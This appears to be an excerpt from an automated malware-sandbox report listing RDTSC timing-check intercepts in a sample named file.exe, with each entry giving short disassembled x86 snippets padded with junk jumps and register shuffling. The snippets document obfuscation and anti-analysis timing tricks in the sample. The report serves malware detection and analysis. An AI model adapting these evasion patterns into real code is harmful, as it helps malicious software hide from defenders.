Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C10F9 second address: 73C10FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C10FF second address: 73C1151 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85D338E37h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esi+04h] 0x0000000e jmp 00007FC85D338E36h 0x00000013 mov dword ptr [edx+04h], eax 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FC85D338E37h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C1151 second address: 73C1157 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C1157 second address: 73C115B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C115B second address: 73C11C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+08h] 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FC85CDF02ADh 0x00000012 xor eax, 64E1B636h 0x00000018 jmp 00007FC85CDF02B1h 0x0000001d popfd 0x0000001e popad 0x0000001f mov dword ptr [edx+08h], eax 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007FC85CDF02AFh 0x0000002b adc ecx, 28A0F36Eh 0x00000031 jmp 00007FC85CDF02B9h 0x00000036 popfd 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C11C6 second address: 73C11CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C11CB second address: 73C121E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85CDF02B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+0Ch] 0x0000000c pushad 0x0000000d call 00007FC85CDF02B4h 0x00000012 call 00007FC85CDF02B2h 0x00000017 pop esi 0x00000018 pop edx 0x00000019 mov ch, 70h 0x0000001b popad 0x0000001c mov dword ptr [edx+0Ch], eax 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 mov si, dx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C121E second address: 73C1290 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esi+10h] 0x0000000a pushad 0x0000000b mov dx, si 0x0000000e mov esi, 5ED719BBh 0x00000013 popad 0x00000014 mov dword ptr [edx+10h], eax 0x00000017 jmp 00007FC85D338E2Eh 0x0000001c mov eax, dword ptr [esi+14h] 0x0000001f jmp 00007FC85D338E30h 0x00000024 mov dword ptr [edx+14h], eax 0x00000027 pushad 0x00000028 call 00007FC85D338E2Eh 0x0000002d mov ah, DCh 0x0000002f pop ebx 0x00000030 mov edi, eax 0x00000032 popad 0x00000033 mov eax, dword ptr [esi+18h] 0x00000036 jmp 00007FC85D338E36h 0x0000003b mov dword ptr [edx+18h], eax 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 popad 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C1290 second address: 73C12AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85CDF02B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C12AD second address: 73C12B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C12B3 second address: 73C12B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C12B7 second address: 73C12BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C12BB second address: 73C1354 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+1Ch] 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FC85CDF02B5h 0x00000012 sbb ecx, 54760D46h 0x00000018 jmp 00007FC85CDF02B1h 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007FC85CDF02B0h 0x00000024 sbb si, 79E8h 0x00000029 jmp 00007FC85CDF02ABh 0x0000002e popfd 0x0000002f popad 0x00000030 mov dword ptr [edx+1Ch], eax 0x00000033 pushad 0x00000034 mov dh, ch 0x00000036 pushfd 0x00000037 jmp 00007FC85CDF02B1h 0x0000003c sbb si, 7006h 0x00000041 jmp 00007FC85CDF02B1h 0x00000046 popfd 0x00000047 popad 0x00000048 mov eax, dword ptr [esi+20h] 0x0000004b push eax 0x0000004c push edx 0x0000004d pushad 0x0000004e push edi 0x0000004f pop esi 0x00000050 movsx edx, si 0x00000053 popad 0x00000054 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C1354 second address: 73C1383 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85D338E31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+20h], eax 0x0000000c jmp 00007FC85D338E2Eh 0x00000011 mov eax, dword ptr [esi+24h] 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C1383 second address: 73C1387 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C1387 second address: 73C13A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85D338E39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C13A4 second address: 73C1443 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85CDF02B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+24h], eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FC85CDF02ACh 0x00000013 sbb eax, 620235C8h 0x00000019 jmp 00007FC85CDF02ABh 0x0000001e popfd 0x0000001f call 00007FC85CDF02B8h 0x00000024 mov edx, ecx 0x00000026 pop eax 0x00000027 popad 0x00000028 mov eax, dword ptr [esi+28h] 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007FC85CDF02B3h 0x00000032 jmp 00007FC85CDF02B3h 0x00000037 popfd 0x00000038 popad 0x00000039 mov dword ptr [edx+28h], eax 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007FC85CDF02B7h 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C1443 second address: 73C1447 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C1447 second address: 73C144D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C144D second address: 73C1484 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, 4Ah 0x00000005 call 00007FC85D338E37h 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ecx, dword ptr [esi+2Ch] 0x00000011 pushad 0x00000012 call 00007FC85D338E31h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C1484 second address: 73C14AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 mov dword ptr [edx+2Ch], ecx 0x00000009 pushad 0x0000000a push eax 0x0000000b mov ecx, edi 0x0000000d pop ebx 0x0000000e popad 0x0000000f mov ax, word ptr [esi+30h] 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FC85CDF02B3h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C14AC second address: 73C14D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC85D338E2Fh 0x00000009 jmp 00007FC85D338E33h 0x0000000e popfd 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C14D5 second address: 73C14E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov word ptr [edx+30h], ax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C14E6 second address: 73C14EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C14EA second address: 73C14F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C14F0 second address: 73C153A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85D338E38h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ax, word ptr [esi+32h] 0x0000000d pushad 0x0000000e call 00007FC85D338E2Dh 0x00000013 jmp 00007FC85D338E30h 0x00000018 pop ecx 0x00000019 popad 0x0000001a mov word ptr [edx+32h], ax 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C153A second address: 73C1540 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C1540 second address: 73C15CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85D338E35h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+34h] 0x0000000c pushad 0x0000000d mov esi, 6E1C8693h 0x00000012 mov esi, 1E7EF8EFh 0x00000017 popad 0x00000018 mov dword ptr [edx+34h], eax 0x0000001b pushad 0x0000001c push ecx 0x0000001d mov esi, edx 0x0000001f pop edx 0x00000020 call 00007FC85D338E38h 0x00000025 call 00007FC85D338E32h 0x0000002a pop esi 0x0000002b pop edi 0x0000002c popad 0x0000002d test ecx, 00000700h 0x00000033 pushad 0x00000034 mov dl, al 0x00000036 mov eax, ebx 0x00000038 popad 0x00000039 jne 00007FC8CC1B6F94h 0x0000003f pushad 0x00000040 pushad 0x00000041 mov bx, 153Eh 0x00000045 push edx 0x00000046 pop esi 0x00000047 popad 0x00000048 popad 0x00000049 or dword ptr [edx+38h], FFFFFFFFh 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007FC85D338E2Ch 0x00000054 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73F0493 second address: 73F04A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC85CDF02AFh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73F04A7 second address: 73F052A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 pushad 0x00000009 mov esi, 3B1D9CD1h 0x0000000e mov eax, 6F0E350Dh 0x00000013 popad 0x00000014 push eax 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007FC85D338E39h 0x0000001c sub esi, 5B7AF496h 0x00000022 jmp 00007FC85D338E31h 0x00000027 popfd 0x00000028 jmp 00007FC85D338E30h 0x0000002d popad 0x0000002e xchg eax, ebp 0x0000002f pushad 0x00000030 mov bx, ax 0x00000033 pushfd 0x00000034 jmp 00007FC85D338E2Ah 0x00000039 add cx, CBE8h 0x0000003e jmp 00007FC85D338E2Bh 0x00000043 popfd 0x00000044 popad 0x00000045 mov ebp, esp 0x00000047 push eax 0x00000048 push edx 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c popad 0x0000004d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73F052A second address: 73F0545 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85CDF02B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73F0545 second address: 73F054B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73F054B second address: 73F054F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73B09D1 second address: 73B09D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73B09D5 second address: 73B09DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73B09DB second address: 73B09E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73B09E1 second address: 73B09E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7370063 second address: 7370068 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7370068 second address: 73700AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cl, bh 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FC85CDF02B2h 0x00000012 xor esi, 3F906148h 0x00000018 jmp 00007FC85CDF02ABh 0x0000001d popfd 0x0000001e mov ah, F0h 0x00000020 popad 0x00000021 pop ebp 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FC85CDF02ADh 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73700AE second address: 73700C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85D338E31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73700C3 second address: 73700C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 737063E second address: 73706C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC85D338E2Ah 0x00000009 adc ecx, 038F0048h 0x0000000f jmp 00007FC85D338E2Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 xchg eax, ebp 0x00000019 jmp 00007FC85D338E36h 0x0000001e push eax 0x0000001f jmp 00007FC85D338E2Bh 0x00000024 xchg eax, ebp 0x00000025 pushad 0x00000026 jmp 00007FC85D338E34h 0x0000002b pushfd 0x0000002c jmp 00007FC85D338E32h 0x00000031 or al, 00000038h 0x00000034 jmp 00007FC85D338E2Bh 0x00000039 popfd 0x0000003a popad 0x0000003b mov ebp, esp 0x0000003d pushad 0x0000003e push eax 0x0000003f push edx 0x00000040 movzx eax, bx 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73706C5 second address: 73706EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85CDF02B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, eax 0x0000000b popad 0x0000000c pop ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73706EA second address: 73706EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73706EE second address: 73706F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73B0907 second address: 73B090B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73B090B second address: 73B090F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73B090F second address: 73B0915 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73B0915 second address: 73B091B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73B091B second address: 73B091F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73B091F second address: 73B0936 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov edi, 0E1BA6CCh 0x0000000f popad 0x00000010 xchg eax, ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73B0936 second address: 73B0952 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85D338E38h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73B0952 second address: 73B0987 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85CDF02ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c jmp 00007FC85CDF02B4h 0x00000011 mov eax, 7B24DB51h 0x00000016 popad 0x00000017 pop ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov dh, 63h 0x0000001d mov edi, eax 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73A00C2 second address: 73A00D9 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 2D8404ADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b pop edi 0x0000000c push esi 0x0000000d pop ebx 0x0000000e popad 0x0000000f popad 0x00000010 xchg eax, ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73A00D9 second address: 73A00DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73A00DD second address: 73A00F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85D338E2Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73A00F0 second address: 73A00F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73A00F6 second address: 73A00FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73A00FA second address: 73A01E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a movzx esi, di 0x0000000d pushfd 0x0000000e jmp 00007FC85CDF02B9h 0x00000013 sub ah, FFFFFFC6h 0x00000016 jmp 00007FC85CDF02B1h 0x0000001b popfd 0x0000001c popad 0x0000001d xchg eax, ebx 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007FC85CDF02ACh 0x00000025 adc ah, 00000068h 0x00000028 jmp 00007FC85CDF02ABh 0x0000002d popfd 0x0000002e pushfd 0x0000002f jmp 00007FC85CDF02B8h 0x00000034 add al, FFFFFFC8h 0x00000037 jmp 00007FC85CDF02ABh 0x0000003c popfd 0x0000003d popad 0x0000003e xchg eax, esi 0x0000003f pushad 0x00000040 mov cl, 77h 0x00000042 mov ch, bl 0x00000044 popad 0x00000045 push eax 0x00000046 jmp 00007FC85CDF02B3h 0x0000004b xchg eax, esi 0x0000004c jmp 00007FC85CDF02B6h 0x00000051 xchg eax, edi 0x00000052 push eax 0x00000053 push edx 0x00000054 pushad 0x00000055 movsx ebx, ax 0x00000058 pushfd 0x00000059 jmp 00007FC85CDF02B6h 0x0000005e adc ax, 27E8h 0x00000063 jmp 00007FC85CDF02ABh 0x00000068 popfd 0x00000069 popad 0x0000006a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73A01E0 second address: 73A01E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73A01E5 second address: 73A0231 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FC85CDF02B0h 0x0000000f xchg eax, edi 0x00000010 jmp 00007FC85CDF02B0h 0x00000015 mov edi, dword ptr [ebp+08h] 0x00000018 jmp 00007FC85CDF02B0h 0x0000001d mov dword ptr [esp+24h], 00000000h 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73A0231 second address: 73A0235 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73A0235 second address: 73A023B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73A023B second address: 73A0266 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85D338E34h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lock bts dword ptr [edi], 00000000h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC85D338E2Ah 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73A0266 second address: 73A026C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73A026C second address: 73A02BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC85D338E38h 0x00000009 jmp 00007FC85D338E35h 0x0000000e popfd 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 jc 00007FC8CD2EAFB8h 0x00000018 jmp 00007FC85D338E2Eh 0x0000001d pop edi 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73A02BC second address: 73A02D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85CDF02B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73A02D9 second address: 73A02F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop ecx 0x00000005 mov ecx, edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC85D338E30h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73A02F6 second address: 73A0333 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, D364h 0x00000007 movsx edx, cx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop ebx 0x0000000e jmp 00007FC85CDF02B4h 0x00000013 mov esp, ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FC85CDF02B7h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73A0333 second address: 73A0338 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73B0A7E second address: 73B0AE0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 17BD2956h 0x00000008 pushfd 0x00000009 jmp 00007FC85CDF02B7h 0x0000000e add cx, 1DDEh 0x00000013 jmp 00007FC85CDF02B9h 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, ebp 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 pushfd 0x00000021 jmp 00007FC85CDF02AAh 0x00000026 add ax, 35D8h 0x0000002b jmp 00007FC85CDF02ABh 0x00000030 popfd 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73B0AE0 second address: 73B0B27 instructions: 0x00000000 rdtsc 0x00000002 mov ebx, ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ebp, esp 0x00000009 jmp 00007FC85D338E31h 0x0000000e pop ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FC85D338E36h 0x00000018 sub si, 7A98h 0x0000001d jmp 00007FC85D338E2Bh 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
